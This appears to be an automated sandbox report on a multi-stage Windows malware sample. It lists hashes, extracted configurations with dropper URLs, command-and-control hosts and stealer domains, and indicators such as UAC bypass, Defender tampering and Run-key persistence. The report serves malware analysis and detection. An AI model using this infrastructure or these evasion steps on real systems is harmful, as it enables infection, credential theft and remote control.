amadey | 4cff116e4bbe2387e7c77f370e1b314cb148274ae5db2bfe761f9a8294d65cf8

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
05/04/2025, 20:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-05_1ac31aa4d784d6c2a063052dd636f8e5_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

1ac31aa4d784d6c2a063052dd636f8e5
SHA1

70f501c9f3ea512b88a20b520b2f01fec4626777
SHA256

4cff116e4bbe2387e7c77f370e1b314cb148274ae5db2bfe761f9a8294d65cf8
SHA512

7799f3cee25864c16b52634d6f6048e155e5b7cbebd1c12113a564b9bc982987a132c4a80afe2ce5696e3d5695c3ba345642199435a14e67a9f322bdcffbbcc0
SSDEEP

24576:oqDEvCTbMWu7rQYlBQcBiT6rprG8a08u:oTvC/MTQYxsWR7a08

Score

10^/10

amadey darkvision gcleaner lumma quasar xworm 092155 office04 defense_evasion discovery execution exploit loader persistence rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes

encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Modded Client Startup
subdirectory
SubDir

Extracted

Family

xworm

104.234.124.126:3360

147.185.221.25:30424

upon-hartford.gl.at.ply.gg:30424

Attributes

install_file
USB.exe

Extracted

Family

gcleaner

185.156.73.98

45.91.200.135

Extracted

Family

lumma

https://rodformi.run/aUosoz

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://advennture.top/GKsiio

https://atargett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://pepperiop.digital/oage

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://starcloc.bet/GOksAo

Extracted

Family

darkvision

82.29.67.160

Attributes

url
http://107.174.192.179/data/003

https://grabify.link/ZATFQO

http://107.174.192.179/clean
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/2996-1226-0x0000000002CD0000-0x0000000002CDE000-memory.dmp	disable_win_def

DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision

Detect Xworm Payload 3 IoCs

resource	yara_rule
behavioral1/memory/2512-162-0x0000000000400000-0x000000000041A000-memory.dmp	family_xworm
behavioral1/files/0x000f00000002428b-216.dat	family_xworm
behavioral1/memory/2996-225-0x0000000000B00000-0x0000000000B16000-memory.dmp	family_xworm

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral1/memory/948-138-0x000000000CE30000-0x000000000CF84000-memory.dmp	family_quasar
behavioral1/memory/948-139-0x00000000055E0000-0x00000000055FA000-memory.dmp	family_quasar

UAC bypass 3 TTPs 1 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	ahcgjm.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempS2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	48a26aad3a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f7e9929970.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bafa6cb643.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f43444a477.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

Blocklisted process makes network request 8 IoCs

flow	pid	Process
7	4364	powershell.exe
47	948	powershell.exe
69	948	powershell.exe
82	948	powershell.exe
86	4996	powershell.exe
101	948	powershell.exe
202	948	powershell.exe
224	948	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3300	powershell.exe
4124	powershell.exe
5036	powershell.exe
5960	powershell.exe
5716	powershell.exe
5264	powershell.exe
3292	powershell.exe
432	powershell.exe
1792	powershell.exe
3520	powershell.exe
12984	powershell.exe
4364	powershell.exe
948	powershell.exe
4996	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 18 IoCs

flow	pid	Process
49	5584	rapes.exe
49	5584	rapes.exe
49	5584	rapes.exe
49	5584	rapes.exe
49	5584	rapes.exe
49	5584	rapes.exe
49	5584	rapes.exe
199	448	svchost015.exe
204	2452	svchost015.exe
213	5052	svchost.exe
7	4364	powershell.exe
42	5584	rapes.exe
51	4660	futors.exe
86	4996	powershell.exe
205	5584	rapes.exe
205	5584	rapes.exe
72	4660	futors.exe
236	5584	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
5344	takeown.exe
5948	icacls.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 22 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f43444a477.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	a1a23f99c9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	a1a23f99c9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	48a26aad3a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f7e9929970.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempS2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempS2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f43444a477.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	48a26aad3a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f7e9929970.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bafa6cb643.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bafa6cb643.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	amnew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	ahcgjm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	futors.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	272.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Control Panel\International\Geo\Nation	272.exe

Deletes itself 1 IoCs

pid	Process
3904	w32tm.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bda32016.cmd	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Steam.lnk	ahcgjm.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Steam.lnk	ahcgjm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_bda32016.cmd	powershell.exe

Executes dropped EXE 38 IoCs

pid	Process
1088	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
5584	rapes.exe
5712	rapes.exe
4664	amnew.exe
4660	futors.exe
3136	Lkp52R3.exe
2996	ahcgjm.exe
4548	f7e9929970.exe
4968	$77Steam.exe
448	svchost015.exe
5932	mTk60rz.exe
5044	ZSoeRVBe.exe
6080	25c18530d2.exe
228	bb3887a024.exe
2452	svchost015.exe
3708	rapes.exe
5668	TempS2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE
5300	futors.exe
4624	$77Steam.exe
2000	bafa6cb643.exe
5884	f43444a477.exe
3380	a1a23f99c9.exe
5748	f3cca57da9.exe
4500	apple.exe
5004	272.exe
4632	272.exe
4352	Lkp52R3.exe
392	amnew.exe
4788	23c170f0c6.exe
5088	svchost015.exe
5676	48a26aad3a.exe
3128	UZPt0hR.exe
1632	rapes.exe
2256	futors.exe
4508	$77Steam.exe
3368	LJl8AAr.exe
3740	tzutil.exe
3904	w32tm.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	f7e9929970.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	f43444a477.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	48a26aad3a.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	TempS2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\Software\Wine	bafa6cb643.exe

Loads dropped DLL 47 IoCs

pid	Process
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe
5044	ZSoeRVBe.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5344	takeown.exe
5948	icacls.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Steam = "C:\\Users\\Admin\\AppData\\Local\\$77Steam.exe"	ahcgjm.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f7e9929970.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10052500101\\f7e9929970.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\25c18530d2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10052510101\\25c18530d2.exe"	futors.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f43444a477.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10467150101\\f43444a477.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a1a23f99c9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10467160101\\a1a23f99c9.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f3cca57da9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10467170101\\f3cca57da9.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\apple.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10467180101\\apple.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3920955164-3782810283-1225622749-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}"	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x00070000000242fb-488.dat	autoit_exe
behavioral1/files/0x00090000000242c9-611.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
1088	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
5584	rapes.exe
5712	rapes.exe
4548	f7e9929970.exe
3708	rapes.exe
5668	TempS2L7PW2FS6QGWBIZIAWW7ERQYOPZMYC3.EXE
2000	bafa6cb643.exe
5884	f43444a477.exe
5676	48a26aad3a.exe
1632	rapes.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3136 set thread context of 2512	3136	Lkp52R3.exe	125
PID 4548 set thread context of 448	4548	f7e9929970.exe	149
PID 6080 set thread context of 2452	6080	25c18530d2.exe	163
PID 4352 set thread context of 1588	4352	Lkp52R3.exe	264
PID 4788 set thread context of 5088	4788	23c170f0c6.exe	272
PID 3368 set thread context of 5260	3368	LJl8AAr.exe	288

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	Temp1L5OP5SHBUOSUSSY0NIRCY8HWFSIPT9P.EXE
File created	C:\Windows\Tasks\futors.job	amnew.exe

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3784	sc.exe
5276	sc.exe
5088	sc.exe
2840	sc.exe
2240	sc.exe
1232	sc.exe
5996	sc.exe
2464	sc.exe
3132	sc.exe
432	sc.exe
2840	sc.exe
3632	sc.exe
1428	sc.exe
5032	sc.exe
5336	sc.exe
5908	sc.exe
3520	sc.exe
5352	sc.exe
2196	sc.exe
1476	sc.exe
4424	sc.exe
1960	sc.exe
4880	sc.exe
2988	sc.exe
2320	sc.exe
3276	sc.exe
2664	sc.exe
4676	sc.exe
1956	sc.exe
5448	sc.exe
1076	sc.exe
2752	sc.exe
5248	sc.exe
4100	sc.exe
4736	sc.exe
3576	sc.exe
5996	sc.exe
3320	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 50 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f3cca57da9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f7e9929970.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
